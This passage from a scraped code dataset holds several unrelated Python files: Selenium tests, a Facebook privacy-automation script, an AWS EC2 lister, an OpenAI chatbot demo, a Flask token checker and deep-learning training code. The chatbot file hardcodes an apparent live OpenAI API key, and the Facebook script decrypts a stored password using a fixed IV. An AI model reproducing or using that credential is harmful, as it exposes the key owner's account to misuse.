def get(self, index):\n data = torch.load(os.path.join(self.processed_dir, f\"{self.name}_{index+1}.pt\"))\n return data\n\n\nif __name__ == '__main__':\n root_dir = \"data/\"\n train_dataset = GNNDataset(root=root_dir)\n test_dataset = GNNDataset(root=root_dir, test_data=True)\n\n print(f\"Length of training dataset : {len(train_dataset)}\")\n print(f\"Length of testing dataset : {len(test_dataset)}\")\n","repo_name":"sagnik1511/CureGraph","sub_path":"src/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":1735,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"31"} +{"seq_id":"15068280378","text":"import time\nimport unittest\n\nimport pytest\nfrom selenium import webdriver\nfrom selenium.webdriver import ActionChains\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.wait import WebDriverWait\n\nfrom Pages.CasualDressPage import CasualDressPageObject\nfrom Pages.HomePage import HomePageObjects\n\n\nclass CasualDressTest(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n cls.driver = webdriver.Chrome(executable_path=\"C:\\Software\\chromedriver_win32\\chromedriver.exe\")\n cls.driver.implicitly_wait(2)\n cls.driver.get(\"http://automationpractice.com/index.php\")\n cls.driver.maximize_window()\n time.sleep(1)\n\n @pytest.mark.order(1)\n def test_click_casual_btn(self):\n driver = self.driver\n homePageObj = HomePageObjects(driver)\n axn = ActionChains(driver)\n axn.move_to_element(homePageObj.get_dress_tag()).perform()\n time.sleep(3)\n axn.move_to_element(homePageObj.get_casual_dress()).click().perform()\n time.sleep(2)\n\n\n @pytest.mark.order(2)\n def test_add_to_cart_validation(self):\n driver = self.driver\n driver.execute_script(\"window.scrollTo(0, 600)\")\n time.sleep(1)\n casualDressPageObj = CasualDressPageObject(driver)\n axn2 = ActionChains(driver)\n axn2.move_to_element(casualDressPageObj.hover_on_image()).perform()\n time.sleep(3)\n axn3 = ActionChains(driver)\n axn3.move_to_element(casualDressPageObj.get_add_to_cart_btn()).click().perform()\n time.sleep(2)\n\n @pytest.mark.order(3)\n def test_validate_cart_msg(self):\n driver = self.driver\n casualDressPageObj = CasualDressPageObject(driver)\n casualDressPageObj.get_cart_msg()\n print(casualDressPageObj.get_cart_msg())\n msg = 'Product successfully added to your shopping cart'\n assert msg == casualDressPageObj.get_cart_msg()\n time.sleep(5)\n\n @pytest.mark.order(4)\n def test_validate_cart_button(self):\n driver = self.driver\n casualDressPageObj = CasualDressPageObject(driver)\n button = casualDressPageObj.get_checkout_btn()\n element = WebDriverWait(driver, 10).until(\n EC.element_to_be_clickable((By.XPATH, button))\n )\n #axn4 = ActionChains(driver)\n #axn4.move_to_element(button).click().perform()\n element.click()\n time.sleep(3)\n\n @classmethod\n def tearDownClass(cls):\n cls.driver.close()\n","repo_name":"ETyrion/Selenium_Python","sub_path":"Tests/CasualDressPageTest.py","file_name":"CasualDressPageTest.py","file_ext":"py","file_size_in_byte":2551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27355705592","text":"from tkinter import *\n\n\n\ndef update_text(label, msg):\n\tdef update():\n\t\ttx = \"\"\n\t\tfor t in msg:\n\t\t\ttx += \"\\n\" + t\n\t\tlabel.config(text=tx)\t# config(text=...) takes a string; textvariable expects a Tk variable\n\t\tlabel.after(1000, update)\n\tupdate()\n\ndef create_window(title, msg):\n\n\t# Prepare the 
window\n\tcima = Tk()\n\tF = Frame(cima)\n\tF.pack()\n\n\t# Rename the window\n\tF.master.title(title)\n\n\tlCiao = Label(F, \n\t\tjustify=LEFT,\n compound = LEFT,\n padx = 10,\n text = msg)\n\tlCiao.pack(side = \"left\")\n\n\t#update_text(lCiao, msg)\n\n\t# Start the main loop\n\tcima.mainloop()\n\n","repo_name":"tommasoberlose/p2p_kazaa","sub_path":"Interface.py","file_name":"Interface.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70670521687","text":"import tkinter as tk\nfrom tkinter import filedialog\nfrom window.Frame import Frame\nfrom functools import partial\nfrom functions import to_only_int, to_max_size\n\n\nclass Save(Frame):\n def __init__(self, window_tool, window_options, variables: dict):\n super().__init__(window_tool, window_options, variables, btntxt=\"Save options\")\n\n def window_options(self):\n self.variables[\"dir_path\"] = tk.StringVar(self.options_frame, value=\"\")\n self.variables[\"file_name\"] = tk.StringVar(self.options_frame, value=\"output\")\n self.variables[\"duration\"] = tk.StringVar(self.options_frame, value=\"100\")\n\n self.variables[\"duration\"].trace(\"w\", partial(self.entry_test, self.variables[\"duration\"], 5, only_int=True))\n\n label01 = tk.Label(self.options_frame, text=\"Directory\")\n entry01 = tk.Entry(self.options_frame, textvariable=self.variables[\"dir_path\"])\n btn01 = tk.Button(self.options_frame, text=\"Choose directory\", command=self.open_filedialog)\n\n label02 = tk.Label(self.options_frame, text=\"File name\")\n entry02 = tk.Entry(self.options_frame, textvariable=self.variables[\"file_name\"])\n\n duration = tk.Frame(self.options_frame)\n tk.Label(duration, text=\"duration\").grid(column=0, row=0)\n tk.Entry(duration, width=5, textvariable=self.variables[\"duration\"]).grid(column=1, row=0)\n\n self.variables[\"infinite_loop\"] = tk.IntVar()\n tk.Checkbutton(self.options_frame, text=\"Infinite loop\", variable=self.variables[\"infinite_loop\"]).pack()\n generate_button = tk.Button(self.options_frame, text=\"Save GIF\", command=self.variables[\"GifManager\"].save_gif)\n\n self.pack_all(label01, entry01, btn01, label02, entry02, duration, generate_button)\n\n def open_filedialog(self):\n self.variables[\"dir_path\"].set(filedialog.askdirectory())\n\n def entry_test(self, text_var: tk.StringVar, limit: int, a, b, c, only_int=False):\n if only_int:\n text_var.set(to_only_int(text_var.get()))\n\n text_var.set(to_max_size(text_var.get(), limit)) # enforce the caller-supplied length limit\n","repo_name":"LMGerard/GIF_App","sub_path":"window/Save.py","file_name":"Save.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"17433438837","text":"import sys\nimport krypto_vigenere_main as vigenere\n\nif len(sys.argv) == 4:\n input_file = sys.argv[1]\n key = sys.argv[2]\n output_file = sys.argv[3]\n\n V = vigenere.Viginere(key)\n V.encrypt_file(input_file, output_file)\nelif len(sys.argv) == 2:\n input_file = \"original.txt\"\n key = sys.argv[1]\n output_file = \"encrypted.txt\"\n\n V = vigenere.Viginere(key)\n V.encrypt_file(input_file, output_file)\nelse:\n print(\"Wrong Number of Arguments!\")","repo_name":"Hanno1/KryptologieLab","sub_path":"02_vigenere/vigenere_encrypt.py","file_name":"vigenere_encrypt.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} 
+{"seq_id":"27381349275","text":"from selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom Crypto.Cipher import AES\nimport os\nimport time\n\n#Setting up options for the driver\noption = Options()\n\noption.add_argument(\"--disable-infobars\")\noption.add_argument(\"start-maximized\")\noption.add_argument(\"--disable-extensions\")\noption.add_experimental_option('excludeSwitches', ['enable-logging'])\n\n# Pass the argument 1 to allow and 2 to block on the \"Allow Notifications\" pop-up\noption.add_experimental_option(\"prefs\", { \n \"profile.default_content_setting_values.notifications\": 2 \n})\n\n#Creating the driver\ndriver = webdriver.Chrome(options=option, executable_path='../chromedriver.exe')\n\n#Loading the webpage\ndriver.get(\"https://www.facebook.com/stories/create/\")\nprint(driver.title)\n\n#Getting the login fields\nemail = driver.find_element_by_name(\"email\")\npassword = driver.find_element_by_name(\"pass\")\nloginButton = driver.find_element_by_name(\"login\")\n\n#Initializing password from ciphered-hash\nfpath = \"login_info.txt\"\nif (os.path.isfile(fpath) and os.path.getsize(fpath)>0):\n file = open(fpath)\n infos = []\n for line in file:\n line = line.strip()\n infos.append(line)\n emailAddress = infos[0] \n key = infos[1]\n cipherstring = infos[2]\n cipher2 = AES.new(key.encode('utf-8'), AES.MODE_CBC, 'This is an IV456'.encode('utf-8'))\n text = bytes.fromhex(cipherstring)\n original_pass = cipher2.decrypt(text).decode().lstrip()\nelse:\n emailAddress = input('Enter email address or phone number: \\n')\n original_pass = input('Enter password: \\n')\n\n#Filling the login fields\nemail.send_keys(emailAddress)\npassword.send_keys(original_pass)\nloginButton.click()\n\ntry:\n settingsButtonLabel = \"//div[@aria-label='settings']\"\n settingsButton = WebDriverWait(driver, 10).until(EC.presence_of_element_located((By.XPATH, settingsButtonLabel)))\n print(\"Settings button found!\")\n settingsButton.click()\n\n try:\n customRadioClassName = \"//*[text()='Custom']\"\n WebDriverWait(driver, 10).until(EC.presence_of_element_located((By.XPATH, customRadioClassName))).click()\n print(\"'Custom' radio button found!\")\n\n try:\n #Useful method for checking if certain text exists in the webpage\n def is_text_element_exist(text):\n try:\n changeToDiffMode = \"//*[text()='{0}']\".format(text)\n WebDriverWait(driver, 2).until(EC.presence_of_element_located((By.XPATH, changeToDiffMode)))\n return True\n except TimeoutException:\n return False\n \n if is_text_element_exist('Change story privacy'):\n print('clicking change button')\n changeButtonLabel = \"//div[@aria-label='Change']\"\n driver.find_element_by_xpath(changeButtonLabel).click()\n\n try:\n selectPeopleText = \"//*[text()='Select people']\"\n WebDriverWait(driver, 10).until(EC.presence_of_element_located((By.XPATH, selectPeopleText)))\n print(\"'Select people' found!\")\n\n try:\n radioButtonClass = \"//span[@class='d2edcug0 hpfvmrgz qv66sw1b c1et5uql rrkovp55 a8c37x1j keod5gw0 nxhoafnm aigsh9s9 d3f4x2em fe6kdd0r mau55g9w c8b282yb iv3no6db jq4qci2q a3bd9o3v ekzkrbhg oo9gr5id hzawbc8m']\"\n 
radios = WebDriverWait(driver, 10).until(EC.presence_of_all_elements_located((By.XPATH, radioButtonClass))) \n print(\"Friend list initially loaded! \\n- \"+str(len(radios))+\" people\")\n\n # Finding the first 'friend name' on the list and clicking it\n count = 0\n firstFriendNameText = \"//*[text()='{0}']\".format(radios[count].text)\n driver.find_element_by_xpath(firstFriendNameText).click()\n dashes = \" \"\n for i in range(len(radios[count].text), 30):\n dashes+='-'\n print(str(count)+'. '+radios[count].text+dashes+' deselected')\n\n # Accessing the rest of the list by pressing 'TAB' and 'ENTER'\n success = 'unsuccessful'\n while True:\n prevElemText = driver.switch_to.active_element.find_element_by_tag_name('span').text\n # print('prevElem: '+prevElemText)\n ActionChains(driver).send_keys(Keys.TAB).perform()\n activeElem = driver.switch_to.active_element\n count+=1\n\n def is_span_element_exist(activeElem):\n try:\n activeElem.find_element_by_tag_name('span')\n return True\n except NoSuchElementException:\n return False\n\n if (is_span_element_exist(activeElem)):\n span = activeElem.find_element_by_tag_name('span')\n dashes = \" \"\n for i in range(len(span.text), 30):\n dashes+='-'\n # print(str(count)+'. '+span.text if span.text!='Save' else span.text)\n if activeElem.get_attribute('aria-checked')=='true':\n ActionChains(driver).send_keys(Keys.ENTER).perform()\n print(str(count)+'. '+span.text+dashes+' deselected')\n continue\n elif activeElem.get_attribute('aria-checked')=='false':\n print(str(count)+'. '+span.text+dashes+' already deselected')\n continue\n elif activeElem.get_attribute('aria-label')=='Save':\n # ActionChains(driver).send_keys(Keys.ENTER).perform()\n success = 'successful'\n print('Saved settings!')\n break\n else:\n print('Error loading friend list')\n break\n else:\n print('loading list...')\n time.sleep(6)\n prevFrndNameText = \"//*[text()='{0}']\".format(prevElemText)\n e = WebDriverWait(driver, 5).until(EC.presence_of_element_located((By.XPATH, prevFrndNameText)))\n ActionChains(driver).move_to_element(e).click(e).click(e).perform()\n currentElem = driver.switch_to.active_element.find_element_by_tag_name('span').text\n print('previous element: '+currentElem)\n count-=1\n\n # for count, span in enumerate(radios):\n # print(str(count)+\". 
'\"+span.text+\"'\")\n \n # friendNameText = \"//*[text()='{0}']\".format(span.text)\n # # e = WebDriverWait(driver, 5).until(EC.visibility_of_element_located((By.XPATH, friendNameText)))\n # # e.click()\n\n # # actions = ActionChains(driver)\n # # actions.move_to_element(element).perform()\n # # time.sleep(1)\n # # element.click()\n # # elem = WebDriverWait(driver, 5).until(EC.presence_of_element_located((By.XPATH, friendNameText)))\n \n\n print(\"Task Finished - \"+success)\n\n except TimeoutException:\n print(\"Radio button list error!\") \n except TimeoutException:\n print(\"No 'Select people' found!\") \n except TimeoutException:\n print(\"No 'Change Button' found!\") \n except TimeoutException:\n print(\"No radio button named 'custom' found\") \nexcept TimeoutException:\n print(\"No 'settings' button present on 'story' page\")\n\n# time.sleep(60)\n# driver.quit()\n\n\n \n\n\n","repo_name":"NazmuMasood/SeleniumFbFun","sub_path":"dummy/fblogin.py","file_name":"fblogin.py","file_ext":"py","file_size_in_byte":8616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25822168702","text":"import boto3\n\n\ndef ec2(region, ec2_running):\n ec2_client = boto3.client('ec2', region_name=region)\n reservations = ec2_client.describe_instances()['Reservations']\n\n for reservation in reservations:\n for instance in reservation['Instances']:\n state = instance['State']['Name']\n type = instance['InstanceType']\n id = instance['InstanceId']\n launch_time = instance['LaunchTime'].strftime(\"%Y-%m-%d %H:%M:%S\")\n tags = instance['Tags'] if 'Tags' in instance else []\n name = \"unnamed\"\n for tag in tags:\n if tag['Key'] == 'Name':\n name = tag['Value']\n if state == 'running':\n instance_info = {\n 'name': name,\n 'state': state,\n 'type': type,\n 'id': id,\n 'region': region,\n 'launch_time': launch_time\n }\n ec2_running.append(instance_info)\n print('EC2 = ' + str(instance_info))\n return ec2_running\n","repo_name":"ahermassi/AWS-Resources-Patrol","sub_path":"services/ec2.py","file_name":"ec2.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70506023129","text":"import openai\nfrom personality import Personality\n\nopenai.api_key = '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'\n\nqualities = \"\"\njournal_entries = \"\"\n\nqualitiesList = ['moody', 'lashes out to close people', 'often cries']\njournalList = ['Today I had a bad day', \"today was not too bad, I actually felt good but I feel like my roommate thinks I'm dirty\"]\n\n\nqualities = '\\n'.join(qualitiesList)\njournal_entries = '\\n'.join(journalList)\n\nprint(qualities, journal_entries)\n\nprompt = f\"\"\"\nYou are going to write a detailed description of a person based on general characteristics of this person and a collection of personal diary entries that this person wrote.\n\nThis person has the following qualities and characteristics:\n{qualities}\n\nThe person wrote the following things in their personal journal:\n{journal_entries}\n\nWrite a detailed description of this using these information.\n\"\"\"\n\nprint(prompt)\n\n\ndef generate(prompt):\n response = openai.Completion.create(\n model='text-davinci-003',\n prompt=prompt,\n temperature=0.3,\n max_tokens=600,\n top_p=1.0,\n frequency_penalty=0,\n presence_penalty=0\n )\n\n return response.choices[0].text\n\ndef generateChatPrompt(personality, memory):\n prompt = f\"\"\"You are acting as a person with the 
following description: {personality}\n \nConversation so far:\n{memory}\n\nReply to this conversation acting as the person described by the description.\n\n\"\"\"\n return prompt\n\ndef generateMemory(prevText, username, identityName):\n memory = \"\"\n talkers = [username, identityName]\n idx = 0\n for text in prevText[-5:]:\n talker = talkers[(idx)%2]\n idx += 1\n memory += (talker + \": \")\n memory += (text + '\\n\\n')\n #print(memory)\n \n return memory\n\n# personalityDescription = generate(prompt)\n# print(personalityDescription)\npersonalityDescription = \"This person is a complex individual who is often moody and unpredictable. They can lash out to people close to them and are prone to bouts of crying. They often feel misunderstood and can be hard to read. In their personal diary entries, they express a range of emotions from feeling good to feeling like their roommate thinks they are dirty. This person is likely to be a deep thinker, who is constantly reflecting on their life and the world around them. They are likely to be a sensitive soul, who is easily hurt by the words and actions of others. They are likely to be a passionate person, who is driven by their emotions and feelings.\"\n\ninputText = \"\"\nprevText = []\n\nusername = \"username123\"\nidentityname = \"Mark\"\n\nmarkyIdentity = Personality()\n\nwhile inputText != 'q':\n inputText = input()\n prevText.append(inputText)\n #print(prevText)\n\n memory = generateMemory(prevText, username, identityname)\n prompt = generateChatPrompt(personalityDescription, memory)\n #print(prompt)\n outputText = generate(prompt)\n prevText.append(outputText)\n print(outputText)","repo_name":"bjmoonn/hacksc-2023","sub_path":"chatbot-demo.py","file_name":"chatbot-demo.py","file_ext":"py","file_size_in_byte":2999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70575000409","text":"# -*- coding: utf-8 -*-\n\nfrom eaglet.core import api_resource\nfrom eaglet.decorator import param_required\nfrom eaglet.core import watchdog\nfrom eaglet.core.exceptionutil import unicode_full_stack\nfrom business.station_message.message_repository import MessageRepository\nfrom business.station_message.user_has_message_repository import UserHasMessageRepository\n\nclass AMessages(api_resource.ApiResource):\n \"\"\"\n Station message collection\n \"\"\"\n app = \"message\"\n resource = \"messages\"\n\n @param_required(['corp_id:int'])\n def get(args):\n # corp = args['corp']\n # messages = corp.message_repository.get_messages()\n msgrepo = MessageRepository()\n uhm_repo = UserHasMessageRepository()\n\n\n messages = msgrepo.get_messages()\n datas = []\n for message in messages:\n is_read = uhm_repo.get_user_has_message(args['corp_id'], message.id).is_read\n datas.append({\n 'id': message.id,\n 'title': message.title,\n 'content': message.content,\n 'created_at': message.created_at.strftime('%Y-%m-%d %H:%M'),\n 'is_read': is_read\n })\n unread_count = uhm_repo.get_unread_count(args['corp_id'])\n\n return {\n 'messages': datas,\n 'unread_count': unread_count\n }","repo_name":"chengdg/gaia","sub_path":"api/message/a_messages.py","file_name":"a_messages.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40663183923","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nsimulate a set of sequences\n\"\"\"\nimport os\nimport sys\nimport numpy as np\n\nAA = ['A', 'R', 'N', 'D', 'C', 'Q', 'E', 'G', 'H', 'I', 'L', 
'K',\n 'M', 'F', 'P', 'S', 'T', 'W', 'Y', 'V']\n\nSEQ_LEN = 21\nSEQ_NUM = 10\ndef random_seq(seqlen):\n seq = []\n for i in range(seqlen):\n seq.append(AA[np.random.randint(0,len(AA))]) # randint's upper bound is exclusive; (0,19) could never pick 'V'\n return ''.join(seq)\n\nwith open('random_seq.fasta','w') as w_f:\n for i in range(SEQ_NUM):\n print >> w_f,'>seq'+str(i)\n seq = random_seq(SEQ_LEN)\n for s in [seq[i:i+80] for i in range(0,len(seq),80)]:\n print >> w_f,s\n\n","repo_name":"lituan/tools","sub_path":"simulate_seq.py","file_name":"simulate_seq.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6413832228","text":"from flask_jwt_extended import create_access_token\nclass verificador:\n\n \n\n def generaToken(idUsuario):\n return create_access_token(identity=idUsuario)\n \n\n def validaUsuario(idUsuario,operacion):\n respuesta = True\n operacion = operacion.replace(\"/\",\"\")\n permisos = {\n '12345':['sensores','autorizacion'],\n '99999':['sensores','autorizacion','reglas']\n }\n\n if(idUsuario not in permisos):\n respuesta = False\n else:\n if(operacion not in permisos[idUsuario]):\n respuesta = False \n\n return respuesta\n\n","repo_name":"jaalruta/arquitecturas-agiles-de-software-grupo-11","sub_path":"flaskr/componentes/verificador.py","file_name":"verificador.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5996919894","text":"import server\nimport logging\nimport skeletons\nimport sockets\n\n\nclass GameServer:\n def __init__(self, port: int, game_server: server.GameServer) -> None:\n \"\"\"\n Creates a game server wrapping the given game_server logic\n :param port: The port the server will listen on for client connections\n \"\"\"\n super().__init__()\n self._state = skeletons.SharedServerState(game_server, port)\n logging.basicConfig(filename=server.LOG_FILENAME,\n level=server.LOG_LEVEL,\n format='%(asctime)s (%(levelname)s): %(message)s')\n\n def run(self) -> None:\n \"\"\"\n Runs the server\n \"\"\"\n print(\"Booting the server.\")\n skeletons.ServerControlSession(self._state).start()\n\n with sockets.Socket.create_server_socket(self._state.port, server.ACCEPT_TIMEOUT) as server_socket:\n logging.info(\"Waiting for clients to connect on port \" + str(self._state.port))\n\n while self._state.keep_running:\n self._state.concurrent_clients.acquire()\n client_socket = server_socket.accept()\n if client_socket is not None:\n self._state.add_client(client_socket)\n skeletons.ClientSession(self._state, client_socket).start()\n else:\n self._state.concurrent_clients.release()\n\n logging.info(\"Waiting for clients to terminate...\")\n\n logging.info(\"Server stopped\")\n","repo_name":"Miner2317/Distributed-Terminal-Based-Multiplayer-Minesweeper","sub_path":"MinesweeperServer/dm_server/skeletons/game_server.py","file_name":"game_server.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"18304358618","text":"'''\n@Author: Yuan Wang\n@Contact: wangyuan2020@ia.ac.cn\n@File: train.py\n@Time: 2021/12/02 09:59 AM\n'''\n\nimport os\nimport math\nimport time\nimport numpy as np\nfrom scipy import io\nimport torch.optim as optim\nfrom torch.autograd import Variable\nfrom torch.utils.data import DataLoader\nfrom torch.utils.tensorboard import SummaryWriter\nfrom torch.optim.lr_scheduler import CosineAnnealingLR, 
StepLR\n\nfrom init import *\nfrom My_args import *\nfrom augmentations import *\nfrom dataset import FaceLandmarkData\nfrom loss import AdaptiveWingLoss\nfrom util import main_sample\nfrom PAConv_model import PAConv\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\ndef train(args):\n writer = SummaryWriter('runs/3D_face_alignment')\n if args.need_resample:\n main_sample(args.num_points, args.seed, args.sigma, args.sample_way, args.dataset)\n # Randomly partition the dataset\n FaceLandmark = FaceLandmarkData(partition='trainval', data=args.dataset)\n train_size = int(len(FaceLandmark) * 0.7)\n test_size = len(FaceLandmark) - train_size\n torch.manual_seed(args.dataset_seed)\n # Prepare the dataset and dataloader \n train_dataset, test_dataset = torch.utils.data.random_split(FaceLandmark, [train_size, test_size])\n train_loader = DataLoader(train_dataset, num_workers=1, batch_size=args.batch_size, shuffle=True, drop_last=True)\n test_loader = DataLoader(test_dataset, num_workers=1, batch_size=args.test_batch_size, shuffle=True, drop_last=True)\n # data augmentation\n ScaleAndTranslate = PointcloudScaleAndTranslate()\n MOMENTUM_ORIGINAL = 0.1\n MOMENTUM_DECCAY = 0.5\n\n # select a model to train\n model = PAConv(args, 8).to(device) # 68 in FaceScape; 8 in BU-3DFE and FRGC\n model.apply(weight_init)\n model = nn.DataParallel(model)\n\n print('let us use', torch.cuda.device_count(), 'GPUs')\n if args.loss == 'adaptive_wing':\n criterion = AdaptiveWingLoss()\n elif args.loss == 'mse':\n criterion = nn.MSELoss()\n if args.use_sgd:\n print(\"Use SGD\")\n opt = optim.SGD(model.parameters(), lr=args.lr*100, momentum=args.momentum, weight_decay=args.weight_decay)\n else:\n print(\"Use Adam\")\n opt = optim.Adam(model.parameters(), lr=args.lr, eps=1e-08, weight_decay=args.weight_decay)\n if args.scheduler == 'cos':\n scheduler = CosineAnnealingLR(opt, T_max=100, eta_min=0.0001)\n elif args.scheduler == 'step':\n scheduler = StepLR(opt, step_size=40, gamma=0.9)\n\n loss_epoch = 0.0\n for epoch in range(args.epochs):\n iters = 0\n model.train()\n for point, landmark, seg in train_loader:\n seg = torch.where(torch.isnan(seg), torch.full_like(seg, 0), seg)\n iters = iters + 1\n if args.no_cuda == False:\n point = point.to(device) # point: (Batch * num_point * num_dim)\n landmark = landmark.to(device) # landmark : (Batch * landmark * num_dim)\n seg = seg.to(device) # seg: (Batch * point_num * landmark)\n point_normal = normalize_data(point) # point_normal : (Batch * num_point * num_dim)\n point_normal = ScaleAndTranslate(point_normal)\n opt.zero_grad()\n point_normal = point_normal.permute(0, 2, 1) # point : (batch * num_dim * num_point)\n pred_heatmap = model(point_normal)\n\n # Compute the loss function \n loss = criterion(pred_heatmap, seg.permute(0, 2, 1).contiguous())\n loss.backward()\n loss_epoch = loss_epoch + loss.item() # .item() avoids keeping the autograd graph alive across iterations\n opt.step()\n print('Epoch: [%d / %d] Train_Iter: [%d /%d] loss: %.4f' % (epoch + 1, args.epochs, iters, len(train_loader), loss))\n if (epoch + 1) % 5 == 0:\n torch.save(model.state_dict(), './checkpoints/%s/%s/models/model_epoch_%d.t7' % (args.exp_name, args.dataset, epoch+1))\n if args.scheduler == 'cos':\n scheduler.step()\n elif args.scheduler == 'step':\n if opt.param_groups[0]['lr'] > 1e-5:\n scheduler.step()\n if opt.param_groups[0]['lr'] < 1e-5:\n for param_group in opt.param_groups:\n param_group['lr'] = 1e-5\n writer.add_scalar('3D_Face_Alignment_loss', loss_epoch / ((epoch + 1) * len(train_loader)), epoch + 1)\n\n\nif __name__ == \"__main__\":\n # 
Training settings\n args = parser.parse_args()\n _init_()\n args.cuda = not args.no_cuda and torch.cuda.is_available()\n train(args)\n\n\n\n\n","repo_name":"wangyuan123ac/3DFA-GCN","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4539,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"31"} +{"seq_id":"22543992124","text":"import logging\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n'''See how the model handles three different kinds of input'''\n# set up some logging\nlogger = logging.getLogger(__name__)\n\n \ndef mish(x):\n \"\"\"Mish: A Self Regularized Non-Monotonic Neural Activation Function (https://arxiv.org/abs/1908.08681)\"\"\"\n return x * torch.tanh(F.softplus(x))\n\n# Equivalent to a custom BatchNorm; it does not seem to be used in the model.\n# You could try swapping the ordinary BN layers for this custom one.\nclass PSBatchNorm2d(nn.BatchNorm2d):\n \"\"\"How Does BN Increase Collapsed Neural Network Filters? (https://arxiv.org/abs/2001.11216)\"\"\"\n\n def __init__(self, num_features, alpha=0.1, eps=1e-05, momentum=0.001, affine=True, track_running_stats=True):\n super().__init__(num_features, eps, momentum, affine, track_running_stats)\n self.alpha = alpha\n\n def forward(self, x):\n return super().forward(x) + self.alpha\n\n# Use Sequential when the model structure is simple; define forward when it is complex.\n# The first small building block of the model.\nclass BasicBlock(nn.Module):\n def __init__(self, in_planes, out_planes, stride, drop_rate=0.0, activate_before_residual=False):\n super(BasicBlock, self).__init__()\n # define what each layer is\n self.bn1 = nn.BatchNorm2d(in_planes, momentum=0.001)\n self.relu1 = nn.LeakyReLU(negative_slope=0.1, inplace=True)\n self.conv1 = nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,\n padding=1, bias=False)\n self.bn2 = nn.BatchNorm2d(out_planes, momentum=0.001)\n self.relu2 = nn.LeakyReLU(negative_slope=0.1, inplace=True)\n self.conv2 = nn.Conv2d(out_planes, out_planes, kernel_size=3, stride=1,\n padding=1, bias=False)\n self.drop_rate = drop_rate\n # True when the input and output widths are equal, otherwise False\n self.equalInOut = (in_planes == out_planes)\n # If the input/output dimensions do not match, a direct residual connection is impossible:\n # a 1x1 convolution first matches the dimensions, and the residual is applied afterwards.\n self.convShortcut = (not self.equalInOut) and nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=stride,\n padding=0, bias=False) or None\n self.activate_before_residual = activate_before_residual\n\n # define how the data x flows through the block\n def forward(self, x):\n # If the input/output widths differ and activate_before_residual is true,\n # x first goes through BN and a ReLU.\n '''decide whether BN/ReLU must be applied before the residual branch'''\n if not self.equalInOut and self.activate_before_residual == True:\n x = self.relu1(self.bn1(x))\n # otherwise out is obtained directly\n else:\n out = self.relu1(self.bn1(x))\n # if the widths match, feed out through the next conv/relu, otherwise feed x\n out = self.relu2(self.bn2(self.conv1(out if self.equalInOut else x)))\n # apply dropout if requested\n if self.drop_rate > 0:\n out = F.dropout(out, p=self.drop_rate, training=self.training)\n out = self.conv2(out)\n # Add out to one of the two:\n # a direct residual when the widths match, the conv-adjusted shortcut otherwise.\n return torch.add(x if self.equalInOut else self.convShortcut(x), out)\n\n# The second small building block of the model.\n# Here block is the BasicBlock above; a NetworkBlock stacks nb_layers BasicBlocks.\nclass NetworkBlock(nn.Module):\n def __init__(self, nb_layers, in_planes, out_planes, block, stride, drop_rate=0.0, activate_before_residual=False):\n super(NetworkBlock, self).__init__()\n # build the sub-module from the given parameters; x is then fed straight into it\n self.layer = self._make_layer(\n block, in_planes, out_planes, nb_layers, stride, drop_rate, activate_before_residual)\n\n def _make_layer(self, block, in_planes, out_planes, nb_layers, stride, drop_rate, activate_before_residual):\n layers = []\n # nb_layers layers in total, each one a BasicBlock\n for i in range(int(nb_layers)):\n #i == 0 
